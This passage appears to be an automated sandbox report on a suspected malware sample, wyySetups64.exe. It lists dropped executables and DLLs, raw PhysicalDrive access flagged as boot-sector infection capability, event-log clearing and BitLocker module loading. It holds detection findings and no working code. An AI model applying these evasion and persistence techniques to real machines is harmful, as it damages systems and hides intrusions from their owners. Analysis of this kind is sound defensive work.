    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81BEB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d8_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BF52940
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF523F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF527B0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE46C9
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE4660
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d9_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81BEB
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\Downloads\360instpatch.exeJump to dropped file
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Roaming\wyySetups64.exeJump to dropped file
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\360instpatch[1].exeJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dllJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B7DA24 GetPrivateProfileStringW,8_2_00B7DA24
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B49A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,8_2_00B49A0C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF0FE46 GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,GetPrivateProfileIntW,GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,_memset,_wcslen,_memset,inet_addr,inet_addr,_wcslen,__wcslwr,wsprintfW,8_2_6BF0FE46
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B7DA24 GetPrivateProfileStringW,9_2_00B7DA24
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B49A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,9_2_00B49A0C

    Boot Survival

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81BEB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d8_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BF52940
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF523F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF527B0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE46C9
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE4660
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d9_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81BEB

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B6A4F6 __EH_prolog3,IsIconic,ShowWindow,8_2_00B6A4F6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B46727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,8_2_00B46727
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B45C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,8_2_00B45C31
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B46727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,9_2_00B46727
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B45C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,9_2_00B45C31
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,1_2_0337B3C0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B35706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00B35706
    Source: C:\Users\user\Downloads\360instpatch.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\LiveUpdate360Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
